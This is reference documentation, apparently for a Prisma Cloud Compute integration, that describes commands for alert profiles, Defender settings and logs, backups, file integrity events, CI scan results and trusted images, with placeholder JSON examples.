PrismaCloudCompute.AlertProfiles.SecurityAdvisor.EnabledBooleanWhether the security advisor is enabled.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.FindingsURLStringThe security advisor findings URL.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.ProviderIdStringThe security advisor provider ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.TokenURLStringThe security advisor token URL.
PrismaCloudCompute.AlertProfiles.SecurityCenter.CredentialIdStringThe security center crendential ID.
PrismaCloudCompute.AlertProfiles.SecurityCenter.EnabledBooleanWhether the security center is enabled.
PrismaCloudCompute.AlertProfiles.SecurityCenter.SourceIDStringThe security center source ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.AccountIDStringThe security hub account ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.CredentialIdStringThe security hub credential ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.EnabledBooleanWhether the security hub is enabled.
PrismaCloudCompute.AlertProfiles.SecurityHub.RegionStringThe security hub region.
PrismaCloudCompute.AlertProfiles.ServiceNow.ApplicationStringThe ServiceNow application.
PrismaCloudCompute.AlertProfiles.ServiceNow.AssigneeStringThe ServiceNow assignee.
PrismaCloudCompute.AlertProfiles.ServiceNow.CredentialIDStringThe ServiceNow credential ID.
PrismaCloudCompute.AlertProfiles.ServiceNow.ProjectStringThe ServiceNow project.
PrismaCloudCompute.AlertProfiles.Slack.EnabledBooleanWhether the Slack alert profile is enabled.
PrismaCloudCompute.AlertProfiles.Slack.WebhookUrlStringThe Slack URL.
PrismaCloudCompute.AlertProfiles.Splunk.AuthToken.EncryptedStringThe Splunk auth token.
PrismaCloudCompute.AlertProfiles.Splunk.SourceTypeStringThe Splunk source type.
PrismaCloudCompute.AlertProfiles.Splunk.UrlStringThe Splunk URL.
PrismaCloudCompute.AlertProfiles.VulnerabilityImmediateAlertsEnabledBooleanWhether the vulnerability alert is enabled.
PrismaCloudCompute.AlertProfiles.Webhook.CredentialIdStringThe webhook credential ID.
PrismaCloudCompute.AlertProfiles.Webhook.UrlStringThe webhook URL.
PrismaCloudCompute.AlertProfiles._IdStringThe alert profile ID.

Command example#

!prisma-cloud-compute-get-alert-profiles

Context Example#

{
"PrismaCloudCompute": {
"AlertProfiles": {
"Cortex": {
"Application": "xsoar",
"CredentialId": "",
"Enabled": true,
"Url": ""
},
"Email": {
"CredentialId": "",
"Enabled": false,
"From": "",
"Port": 0,
"SmtpAddress": "",
"Ssl": false
},
"GcpPubsub": {
"CredentialId": "",
"Enabled": false,
"Topic": ""
},
"Jira": {
"Assignee": {},
"BaseUrl": "",
"CaCert": "",
"CredentialId": "",
"Enabled": false,
"IssueType": "",
"Labels": {},
"Priority": "",
"ProjectKey": {}
},
"LastError": "",
"Modified": "2023-04-03T18:43:05.575Z",
"Name": "XSOAR",
"Owner": "admin",
"Pagerduty": {
"RoutingKey": {
"Encrypted": ""
},
"Severity": "",
"Summary": ""
},
"Policy": {
"Admission": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"AgentlessAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"AppEmbeddedAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"AppEmbeddedRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"CloudDiscovery": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"CodeRepoVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"ContainerCompliance": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerComplianceScan": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ContainerVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"Defender": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"Docker": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"HostCompliance": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostComplianceScan": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"HostVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"Incident": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"KubernetesAudit": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"NetworkFirewall": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"RegistryVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"ServerlessAppFirewall": {
"AllRules": true,
"Enabled": true,
"Rules": []
},
"ServerlessRuntime": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"VmCompliance": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"VmVulnerability": {
"AllRules": true,
"Enabled": false,
"Rules": []
},
"WaasHealth": {
"AllRules": true,
"Enabled": true,
"Rules": []
}
},
"PreviousName": "",
"SecurityAdvisor": {
"CredentialID": "",
"Enabled": false,
"FindingsURL": "",
"ProviderId": "",
"TokenURL": ""
},
"SecurityCenter": {
"CredentialId": "",
"Enabled": false,
"SourceID": ""
},
"SecurityHub": {
"AccountID": "",
"CredentialId": "",
"Enabled": false,
"Region": ""
},
"ServiceNow": {
"Application": "",
"Assignee": "",
"CredentialID": "",
"Project": ""
},
"Slack": {
"Enabled": false,
"WebhookUrl": ""
},
"Splunk": {
"AuthToken": {
"Encrypted": ""
},
"SourceType": "",
"Url": ""
},
"Sqs": {},
"VulnerabilityImmediateAlertsEnabled": false,
"Webhook": {
"CredentialId": "",
"Url": ""
},
"_Id": "XSOAR"
}
}
}

Human Readable Output#

Alert Profiles#

admissionagentlessAppFirewallappEmbeddedAppFirewallappEmbeddedRuntimecloudDiscoverycodeRepoVulnerabilitycontainerAppFirewallcontainerCompliancecontainerComplianceScancontainerRuntimecontainerVulnerabilitydefenderdockerhostAppFirewallhostCompliancehostComplianceScanhostRuntimehostVulnerabilityincidentkubernetesAuditnetworkFirewallregistryVulnerabilityserverlessAppFirewallserverlessRuntimevmCompliancevmVulnerabilitywaasHealth
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: false
allRules: true
rules:
enabled: true
allRules: true
rules:

prisma-cloud-compute-get-settings-defender#


Get the Defender settings.

Base Command#

prisma-cloud-compute-get-settings-defender

Input#

Argument NameDescriptionRequired
hostnameThe Defender hostname.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.DefenderSettings.AdmissionControlEnabledBooleanThe admission control setting.
PrismaCloudCompute.DefenderSettings.AdmissionControlWebhookSuffixStringThe webhook suffix.
PrismaCloudCompute.DefenderSettings.AppEmbeddedFileSystemTracingEnabledBooleanThe file tracing setting.
PrismaCloudCompute.DefenderSettings.AutomaticUpgradeBooleanThe automatic upgrade setting.
PrismaCloudCompute.DefenderSettings.DisconnectPeriodDaysNumberThe disconnect period in days.
PrismaCloudCompute.DefenderSettings.HostCustomComplianceEnabledBooleanThe custom compliance setting.
PrismaCloudCompute.DefenderSettings.ListeningPortNumberThe defender listening port.

Command example#

!prisma-cloud-compute-get-settings-defender

Context Example#

{
"PrismaCloudCompute": {
"DefenderSettings": {
"AdmissionControlEnabled": false,
"AdmissionControlWebhookSuffix": "sdgfskdjfbsdkfbsdkjfbsdkfbksdjbf",
"AppEmbeddedFileSystemTracingEnabled": false,
"AutomaticUpgrade": false,
"DisconnectPeriodDays": 1,
"HostCustomComplianceEnabled": false,
"ListeningPort": 9998
}
}
}

Human Readable Output#

Results#

AdmissionControlEnabledAdmissionControlWebhookSuffixAppEmbeddedFileSystemTracingEnabledAutomaticUpgradeDisconnectPeriodDaysHostCustomComplianceEnabledListeningPort
falsesdgfskdjfbsdkfbsdkjfbsdkfbksdjbffalsefalse1false9998

prisma-cloud-compute-logs-defender#


Download the Defender logs.

Base Command#

prisma-cloud-compute-logs-defender

Input#

Argument NameDescriptionRequired
hostnameThe Defender hostname.Optional
linesThe number of log lines to fetch. Default is 10.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Defenders.HostnameStringThe hostname the log was retrieved from.
PrismaCloudCompute.Defenders.Logs.LevelStringThe log level.
PrismaCloudCompute.Defenders.Logs.LogStringThe log message.
PrismaCloudCompute.Defenders.Logs.TimeDateThe time of the log.

Command example#

!prisma-cloud-compute-logs-defender hostname=test-host.internal lines=2

Context Example#

{
"PrismaCloudCompute": {
"Defenders": {
"Hostname": "test-host.internal",
"Logs": [
{
"Level": "DEBUG",
"Log": "defender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2}",
"Time": "2023-04-11T13:54:57.862Z"
},
{
"Level": "DEBUG",
"Log": "ws.go:517 Received message with type uploadLogs",
"Time": "2023-04-11T13:54:57.861Z"
}
]
}
}
}

Human Readable Output#

Logs#

levellogtime
DEBUGdefender.go:2042 Received upload logs message: &{DestLogs:defender_1681221297.tar.gz Lines:2}2023-04-11T13:54:57.862Z
DEBUGws.go:517 Received message with type uploadLogs2023-04-11T13:54:57.861Z

prisma-cloud-compute-logs-defender-download#


Download a zip of all Defender logs.

Base Command#

prisma-cloud-compute-logs-defender-download

Input#

Argument NameDescriptionRequired
hostnameThe Defender hostname.Optional
linesThe number of log lines to fetch. Default is 100.Optional

Context Output#

PathTypeDescription
InfoFile.NameStringThe file name.
InfoFile.EntryIDStringThe File entry ID.
InfoFile.SizeNumberThe file size.
InfoFile.TypeStringThe file type.
InfoFile.InfoStringBasic information of the file.
InfoFile.ExtensionStringFile extension.

Command example#

!prisma-cloud-compute-logs-defender-download hostname=`test-host.internal` lines=2

Context Example#

{
"InfoFile": {
"EntryID": "355@d93bd179-ac81-4015-8ddc-c904349d83e0",
"Extension": "gz",
"Info": "application/gzip",
"Name": "test-host.internal",
"Size": 682469,
"Type": "gzip compressed data"
}
}

prisma-cloud-compute-get-backups#


Returns the available backups.

Base Command#

prisma-cloud-compute-get-backups

Input#

Argument NameDescriptionRequired
projectThe project to retrieve the backups from.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.Backups.IdStringThe ID of the backup.
PrismaCloudCompute.Backups.NameStringThe name of the backup.
PrismaCloudCompute.Backups.ReleaseStringThe release of the backup.
PrismaCloudCompute.Backups.TimeDateThe time of the backup.

Command example#

!prisma-cloud-compute-get-backups

Context Example#

{
"PrismaCloudCompute": {
"Backups": [
{
"Id": "daily-22.12.585-1681184909.tar.gz",
"Name": "daily",
"Release": "22.12.585",
"Time": "2023-04-11T03:48:29Z"
},
{
"Id": "monthly-22.12.585-1679972425.tar.gz",
"Name": "monthly",
"Release": "22.12.585",
"Time": "2023-03-28T03:00:25Z"
},
{
"Id": "weekly-22.12.585-1681184909.tar.gz",
"Name": "weekly",
"Release": "22.12.585",
"Time": "2023-04-11T03:48:29Z"
}
]
}
}

Human Readable Output#

Results#

IdNameReleaseTime
daily-22.12.585-1681184909.tar.gzdaily22.12.5852023-04-11T03:48:29Z
monthly-22.12.585-1679972425.tar.gzmonthly22.12.5852023-03-28T03:00:25Z
weekly-22.12.585-1681184909.tar.gzweekly22.12.5852023-04-11T03:48:29Z

prisma-cloud-compute-get-file-integrity-events#


Base Command#

prisma-cloud-compute-get-file-integrity-events

Input#

Argument NameDescriptionRequired
hostnameHostname for which to get runtime file integrity audit events. Either event_id or hostname is required.Optional
event_idEvent ID of runtime file integrity audit event for which to get details. Either event_id or hostname is required.Optional
limitLimit on number of events to return. Only relevant if filtering by hostname. Default is 10.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.FileIntegrity.PathstringThe absolute path of the event.
PrismaCloudCompute.FileIntegrity.RuleNamestringThe name of the applied rule for auditing file integrity rules.
PrismaCloudCompute.FileIntegrity.AccountIDstringThe cloud account ID.
PrismaCloudCompute.FileIntegrity.UserstringThe user that initiated the event.
PrismaCloudCompute.FileIntegrity.TimedateThe time of the event.
PrismaCloudCompute.FileIntegrity.HostnamestringThe hostname on which the event was found.
PrismaCloudCompute.FileIntegrity.EventTypestringRepresents the type of the file integrity event. Possible values: [metadata,read,write].
PrismaCloudCompute.FileIntegrity.CollectionsunknownCollections to which this event applies.
PrismaCloudCompute.FileIntegrity.FqdnstringThe current fully qualified domain name used in audit alerts.
PrismaCloudCompute.FileIntegrity.FileTypenumberRepresents the file type.
PrismaCloudCompute.FileIntegrity.ProcessNamestringThe name of the process that initiated the event.
PrismaCloudCompute.FileIntegrity.ClusterstringThe cluster on which the event was found.
PrismaCloudCompute.FileIntegrity._IdstringThe activity's unique identifier.
PrismaCloudCompute.FileIntegrity.DescriptionunknownA human readable description of the action performed on the path.

Command example#

!prisma-cloud-compute-get-file-integrity-events hostname=host123 limit=3

Context Example#

{
"PrismaCloudCompute": {
"FileIntegrity": [
{
"AccountID": "123",
"Cluster": "",
"Collections": [
"All",
"123"
],
"Description": "Process touch wrote to path (user: root)",
"EventType": "write",
"FileType": 2,
"Fqdn": "",
"Hostname": "host123",
"Path": "/tmp/alert/test1",
"ProcessName": "touch",
"RuleName": "Default - alert on suspicious runtime behavior",
"Time": "2023-08-30T01:16:01.037Z",
"User": "root",
"_Id": "64ee985138b8ac44a6f3d468"
},
{
"AccountID": "123",
"Cluster": "",
"Collections": [
"All",
"123"
],
"Description": "Process touch wrote to path (user: root)",
"EventType": "write",
"FileType": 2,
"Fqdn": "",
"Hostname": "host123",
"Path": "/tmp/alert/test1",
"ProcessName": "touch",
"RuleName": "Default - alert on suspicious runtime behavior",
"Time": "2023-08-30T00:16:01.883Z",
"User": "root",
"_Id": "64ee8a4138b8ac44a6f3d460"
},
{
"AccountID": "123",
"Cluster": "",
"Collections": [
"All",
"123"
],
"Description": "Process touch wrote to path (user: root)",
"EventType": "write",
"FileType": 2,
"Fqdn": "",
"Hostname": "host123",
"Path": "/tmp/alert/test1",
"ProcessName": "touch",
"RuleName": "Default - alert on suspicious runtime behavior",
"Time": "2023-08-29T23:16:01.673Z",
"User": "root",
"_Id": "64ee7c3138b8ac44a6f3d458"
}
]
}
}

Human Readable Output#

Results#

AccountIDClusterCollectionsDescriptionEventTypeFileTypeFqdnHostnamePathProcessNameRuleNameTimeUser_Id
123All,
123
Process touch wrote to path (user: root)write2host123/tmp/alert/test1touchDefault - alert on suspicious runtime behavior2023-08-30T01:16:01.037Zroot64ee985138b8ac44a6f3d468
123All,
123
Process touch wrote to path (user: root)write2host123/tmp/alert/test1touchDefault - alert on suspicious runtime behavior2023-08-30T00:16:01.883Zroot64ee8a4138b8ac44a6f3d460
123All,
123
Process touch wrote to path (user: root)write2host123/tmp/alert/test1touchDefault - alert on suspicious runtime behavior2023-08-29T23:16:01.673Zroot64ee7c3138b8ac44a6f3d458

prisma-cloud-compute-unstuck-fetch-stream#


Use this command to unstuck the fetch stream in case it's getting duplicated incidents.

Base Command#

prisma-cloud-compute-unstuck-fetch-stream

Input#

  • No input.

Context Output#

  • No context output for this command.

Command example#

!prisma-cloud-compute-unstuck-fetch-stream

Human Readable Output#

The fetch stream was released successfully.

prisma-cloud-compute-ci-scan-results-list#


Retrieves all scan reports for images scanned by the Jenkins plugin or twistcli. Maps to Monitor > Vulnerabilities > Images > CI in the Console UI. The default will retrieve only the passed scans.

Base Command#

prisma-cloud-compute-ci-scan-results-list

Input#

Argument NameDescriptionRequired
account_idsA comma-separated list of cloud account IDs to filter the result by.Optional
resource_idsA comma-separated list of resource IDs to scope the query by.Optional
regionA comma-separated list of regions to scope the query by.Optional
scan_idScan ID used in the image layers fetch.Optional
image_idImage ID of scanned image.Optional
job_nameA comma-separated list of Jenkins job names.Optional
searchRetrieves the result for a search term.Optional
passIndicates whether to filter on passed scans (true) or not (false). Possible values are: true, false. Default is true.Optional
scan_time_toFilters results by end datetime. Based on scan time.Optional
scan_time_fromFilters results by start datetime. Based on scan time.Optional
limitThe maximum number of CI scan results to return. Must be between 1-50. Default is 50.Optional
offsetThe offset by which to begin listing CI scan results. Default is 0.Optional

Context Output#

PathTypeDescription
PrismaCloudCompute.CIScan._idStringThe scan ID.
PrismaCloudCompute.CIScan.timeStringThe scan time.
PrismaCloudCompute.CIScan.passBooleanWhether the scan passed.
PrismaCloudCompute.CIScan.vulnFailureSummaryStringVulnerability scan failure summary.
PrismaCloudCompute.CIScan.versionStringThe scan version.
PrismaCloudCompute.CIScan.entityInfo._idStringThe scanned entity ID.
PrismaCloudCompute.CIScan.entityInfo.typeStringThe scanned entity type.
PrismaCloudCompute.CIScan.entityInfo.hostnameStringThe scanned entity hostname.
PrismaCloudCompute.CIScan.entityInfo.scanTimeStringThe entity scan time.
PrismaCloudCompute.CIScan.entityInfo.binariesUnknownBinaries in the scanned entity.
PrismaCloudCompute.CIScan.entityInfo.SecretsUnknownSecrets found in the scanned entity.
PrismaCloudCompute.CIScan.entityInfo.startupBinariesUnknownStartup binaries in the scanned entity.
PrismaCloudCompute.CIScan.entityInfo.osDistroStringThe OS distribution.
PrismaCloudCompute.CIScan.entityInfo.osDistroVersionStringThe OS distribution version.
PrismaCloudCompute.CIScan.entityInfo.osDistroReleaseStringThe OS distribution release.
PrismaCloudCompute.CIScan.entityInfo.distroStringThe distribution.
PrismaCloudCompute.CIScan.entityInfo.packagesUnknownPackages in the scanned entity.
PrismaCloudCompute.CIScan.entityInfo.filesUnknownFiles in the scanned entity.
PrismaCloudCompute.CIScan.entityInfo.packageManagerBooleanThe package manager.
PrismaCloudCompute.CIScan.entityInfo.applicationsUnknownApplications in the scanned entity.
PrismaCloudCompute.CIScan.entityInfo.isARM64BooleanWhether the scanned entity is ARM64.
PrismaCloudCompute.CIScan.entityInfo.packageCorrelationDoneBooleanWhether package correlation was done.
PrismaCloudCompute.CIScan.entityInfo.redHatNonRPMImageBooleanWhether it is a RedHat non-RPM image.
PrismaCloudCompute.CIScan.entityInfo.foundSecretsUnknownWhether secrets were found.
PrismaCloudCompute.CIScan.entityInfo.secretScanMetricsUnknownSecret scan metrics.
PrismaCloudCompute.CIScan.entityInfo.imageUnknownThe scanned image.
PrismaCloudCompute.CIScan.entityInfo.historyUnknownThe image history.
PrismaCloudCompute.CIScan.entityInfo.idStringThe entity ID.
PrismaCloudCompute.CIScan.entityInfo.complianceIssuesUnknownCompliance issues found.
PrismaCloudCompute.CIScan.entityInfo.allComplianceUnknownAll compliance data.
PrismaCloudCompute.CIScan.entityInfo.vulnerabilitiesUnknownVulnerabilities found.
PrismaCloudCompute.CIScan.entityInfo.repoTagUnknownRepository tag.
PrismaCloudCompute.CIScan.entityInfo.tagsUnknownImage tags.
PrismaCloudCompute.CIScan.entityInfo.repoDigestsUnknownRepository digests.
PrismaCloudCompute.CIScan.entityInfo.creationTimeStringImage creation time.
PrismaCloudCompute.CIScan.entityInfo.pushTimeStringImage push time.
PrismaCloudCompute.CIScan.entityInfo.vulnerabilitiesCountNumberNumber of vulnerabilities found.
PrismaCloudCompute.CIScan.entityInfo.complianceIssuesCountNumberNumber of compliance issues found.
PrismaCloudCompute.CIScan.entityInfo.vulnerabilityDistributionUnknownVulnerability distribution data.
PrismaCloudCompute.CIScan.entityInfo.complianceDistributionUnknownCompliance distribution data.
PrismaCloudCompute.CIScan.entityInfo.vulnerabilityRiskScoreNumberVulnerability risk score.
PrismaCloudCompute.CIScan.entityInfo.complianceRiskScoreNumberCompliance risk score.
PrismaCloudCompute.CIScan.entityInfo.layersUnknownImage layers data.
PrismaCloudCompute.CIScan.entityInfo.topLayerStringTop image layer data.
PrismaCloudCompute.CIScan.entityInfo.riskFactorsUnknownRisk factors data.
PrismaCloudCompute.CIScan.entityInfo.labelsUnknownImage labels.
PrismaCloudCompute.CIScan.entityInfo.installedProductsUnknownInstalled products data.
PrismaCloudCompute.CIScan.entityInfo.scanVersionStringThe scan version.
PrismaCloudCompute.CIScan.entityInfo.scanBuildDateStringThe scan build date.
PrismaCloudCompute.CIScan.entityInfo.firstScanTimeStringFirst scan time.
PrismaCloudCompute.CIScan.entityInfo.cloudMetadataUnknownCloud metadata.
PrismaCloudCompute.CIScan.entityInfo.instancesUnknownInstance data.
PrismaCloudCompute.CIScan.entityInfo.hostsUnknownHost data.
PrismaCloudCompute.CIScan.entityInfo.errStringError data.
PrismaCloudCompute.CIScan.entityInfo.collectionsUnknownCollection data.
PrismaCloudCompute.CIScan.entityInfo.scanIDNumberThe scan ID.
PrismaCloudCompute.CIScan.entityInfo.trustStatusStringTrust status data.
PrismaCloudCompute.CIScan.entityInfo.firewallProtectionUnknownFirewall protection data.
PrismaCloudCompute.CIScan.entityInfo.appEmbeddedBooleanWhether app is embedded.
PrismaCloudCompute.CIScan.entityInfo.wildFireUsageUnknownWildFire usage data.
PrismaCloudCompute.CIScan.entityInfo.agentlessBooleanWhether it is an agentless scan.
PrismaCloudCompute.CIScan.entityInfo.malwareAnalyzedTimeStringMalware analyzed time.

Command example#

!prisma-cloud-compute-ci-scan-results-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"CIScan": [
{
"_id": "aaa",
"entityInfo": {
"Secrets": [
"/opt/az/lib/python3.10/test/key.pem"
],
"_id": "sha256:a1",
"agentless": false,
"allCompliance": {},
"appEmbedded": false,
"applications": [
{
"installedFromPackage": true,
"knownVulnerabilities": 115,
"layerTime": 1695214343,
"name": "node",
"path": "/usr/bin/node",
"version": "12.22.9"
}
],
"binaries": [
{
"cveCount": 0,
"fileMode": 493,
"md5": "a1",
"name": "python3.10",
"path": "/opt/az/bin/python3.10"
},
{
"cveCount": 0,
"fileMode": 420,
"md5": "a2",
"name": "python.o",
"path": "/opt/az/lib/python3.10/config-3.10-x86_64-linux-gnu/python.o"
}
],
"cloudMetadata": {},
"collections": [
"All",
"Access Group"
],
"complianceDistribution": {
"critical": 0,
"high": 4,
"low": 0,
"medium": 1,
"total": 5
},
"complianceIssues": [
{
"cause": "",
"cri": false,
"cve": "",
"cvss": 0,
"description": "It is a good practice to run the container as a non-root user, if possible.",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"fixDate": 0,
"functionLayer": "",
"id": 41,
"layerTime": 0,
"link": "",
"packageName": "",
"packageVersion": "",
"published": 0,
"riskFactors": null,
"secret": {},
"severity": "high",
"status": "",
"templates": [
"AAA"
],
"text": "",
"title": "Image should be created with a non-root user",
"twistlock": false,
"type": "image",
"vecStr": "",
"wildfireMalware": {}
}
],
"complianceIssuesCount": 5,
"complianceRiskScore": 40100,
"creationTime": "2023-09-20T12:53:00.899Z",
"distro": "Ubuntu 22.04.3 LTS",
"err": "",
"files": [],
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"firstScanTime": "2023-09-20T12:53:12.177Z",
"foundSecrets": null,
"history": [
{
"created": 1692165712,
"emptyLayer": true,
"id": "11",
"instruction": "RELEASE"
}
],
"hostname": "aaa",
"hosts": {},
"id": "sha256:a3",
"image": {
"created": "2023-09-20T12:53:00.899Z",
"entrypoint": [
"python3"
]
},
"installedProducts": {
"docker": "24.0.6",
"hasPackageManager": true,
"osDistro": "Ubuntu"
},
"instances": [
{
"host": "a4",
"image": "1.dkr.ecr.eu-central-1.amazonaws.com/pythonscript:a3",
"modified": "2023-09-20T12:53:36.956Z",
"registry": "1.dkr.ecr.eu-central-1.amazonaws.com",
"repo": "pythonscript",
"tag": "tag"
}
],
"isARM64": false,
"labels": [
"org.opencontainers.image.ref.name:ubuntu"
],
"layers": [
"sha256:a5"
],
"malwareAnalyzedTime": "0001-01-01T00:00:00Z",
"osDistro": "ubuntu",
"osDistroRelease": "jammy",
"osDistroVersion": "22.04",
"packageCorrelationDone": true,
"packageManager": true,
"pushTime": "0001-01-01T00:00:00Z",
"redHatNonRPMImage": false,
"repoDigests": [],
"repoTag": {
"registry": "1.dkr.ecr.eu-central-1.amazonaws.com",
"repo": "pythonscript",
"tag": "tag"
},
"riskFactors": {
"Attack complexity: low": {},
"Attack vector: network": {},
"Critical severity": {},
"DoS - High": {},
"DoS - Low": {},
"Exploit exists - POC": {},
"Has fix": {},
"High severity": {},
"Medium severity": {},
"Recent vulnerability": {},
"Remote execution": {}
},
"scanBuildDate": "20230914",
"scanID": 0,
"scanTime": "2023-09-20T12:53:36.956Z",
"scanVersion": "31.01.131",
"secretScanMetrics": {},
"tags": [
{
"registry": "1.dkr.ecr.eu-central-1.amazonaws.com",
"repo": "pythonscript",
"tag": "tag"
}
],
"topLayer": "sha256:a6",
"trustStatus": "",
"type": "ciImage",
"vulnerabilitiesCount": 81,
"vulnerabilityDistribution": {
"critical": 1,
"high": 5,
"low": 34,
"medium": 41,
"total": 81
},
"vulnerabilityRiskScore": 1054134,
"wildFireUsage": null
},
"pass": true,
"time": "2023-09-20T12:53:37.229Z",
"version": "30.01.1"
},
{
"_id": "bbb",
"entityInfo": {
"Secrets": [
"/opt/aa/lib/python3.10/test/secret.pem"
],
"_id": "sha256:f3",
"agentless": false,
"allCompliance": {},
"appEmbedded": false,
"applications": [
{
"installedFromPackage": true,
"knownVulnerabilities": 115,
"layerTime": 1695209203,
"name": "ccc",
"path": "/usr/bin/node",
"version": "12.01.01"
}
],
"cloudMetadata": {},
"collections": [
"Access Group"
],
"complianceDistribution": {
"critical": 0,
"high": 4,
"low": 0,
"medium": 1,
"total": 5
},
"complianceIssuesCount": 5,
"complianceRiskScore": 40100,
"creationTime": "2023-09-20T11:27:10.233Z",
"distro": "Ubuntu 22.04.3 LTS",
"err": "",
"files": [],
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"firstScanTime": "2023-09-20T11:27:22.081Z",
"foundSecrets": null,
"hostname": "aaa",
"hosts": {},
"id": "sha256:a1",
"image": {
"created": "2023-09-20T11:27:10.233Z",
"entrypoint": [
"python3"
]
},
"installedProducts": {
"docker": "24.0.6",
"hasPackageManager": true,
"osDistro": "Ubuntu 22.04.3 LTS"
},
"instances": [
{
"host": "aaa",
"image": "pythonserver.azurecr.io/pythonserver:a1",
"modified": "2023-09-20T11:27:50.809Z",
"registry": "pythonserver.azurecr.io",
"repo": "pythonserver",
"tag": "a1"
}
],
"isARM64": false,
"labels": [
"org.opencontainers.image.ref.name:ubuntu",
"org.opencontainers.image.version:22.04"
],
"layers": [
"sha256:a1"
],
"malwareAnalyzedTime": "0001-01-01T00:00:00Z",
"osDistro": "ubuntu",
"osDistroRelease": "jammy",
"osDistroVersion": "22.04",
"packageCorrelationDone": true,
"packageManager": true,
"pushTime": "0001-01-01T00:00:00Z",
"redHatNonRPMImage": false,
"repoDigests": [],
"repoTag": {
"registry": "pythonserver.azurecr.io",
"repo": "pythonserver",
"tag": "tag"
},
"riskFactors": {
"Attack complexity: low": {},
"Attack vector: network": {},
"Critical severity": {},
"DoS - High": {},
"DoS - Low": {},
"Exploit exists - POC": {},
"Has fix": {},
"High severity": {},
"Medium severity": {},
"Recent vulnerability": {},
"Remote execution": {}
},
"scanBuildDate": "20230914",
"scanID": 0,
"scanTime": "2023-09-20T11:27:50.809Z",
"scanVersion": "31.01.131",
"secretScanMetrics": {},
"tags": [
{
"registry": "pythonserver.azurecr.io",
"repo": "pythonserver",
"tag": "tag"
}
],
"topLayer": "sha256:a6",
"trustStatus": "",
"type": "ciImage",
"vulnerabilitiesCount": 72,
"vulnerabilityDistribution": {
"critical": 1,
"high": 5,
"low": 34,
"medium": 32,
"total": 72
},
"vulnerabilityRiskScore": 1053234,
"wildFireUsage": null
},
"pass": true,
"time": "2023-09-20T11:27:51.087Z",
"version": "31.01.131"
}
]
}
}

Human Readable Output#

CI Scan Information#

ImageIDOS DistributionOS ReleaseScan StatusScan Time
1.dkr.ecr.eu-central-1.amazonaws.com/pythonscript:tagsha256:a6ubuntujammytrue2023-09-20T12:53:37.229Z
pythonserver.azurecr.io/pythonserver:a1sha256:a5ubuntujammytrue2023-09-20T11:27:51.087Z

prisma-cloud-compute-trusted-images-list#


Returns the trusted registries, repositories, and images. Maps to the image table in Defend > Compliance > Trusted Images in the Console UI.

Base Command#

prisma-cloud-compute-trusted-images-list

Input#

There are no input arguments for this command.

Context Output#

PathTypeDescription
PrismaCloudCompute.TrustedImage.policy.enabledBooleanWhether the trusted image policy is enabled.
PrismaCloudCompute.TrustedImage.policy._idStringThe ID of the trusted image policy.
PrismaCloudCompute.TrustedImage.policy.rules.nameStringThe name of the trusted image rule.
PrismaCloudCompute.TrustedImage.policy.rules.allowedGroupsUnknownThe allowed groups for the trusted image rule.
PrismaCloudCompute.TrustedImage.policy.rules.effectStringThe effect of the trusted image rule.
PrismaCloudCompute.TrustedImage.policy.rules.modifiedDateThe last modified timestamp for the trusted image rule.
PrismaCloudCompute.TrustedImage.policy.rules.previousNameStringThe previous name of the trusted image rule.
PrismaCloudCompute.TrustedImage.policy.rules.ownerStringThe owner of the trusted image rule.
PrismaCloudCompute.TrustedImage.policy.rules.disabledBooleanWhether the trusted image rule is disabled.
PrismaCloudCompute.TrustedImage.policy.rules.collectionsUnknownThe collections for the trusted image rule.
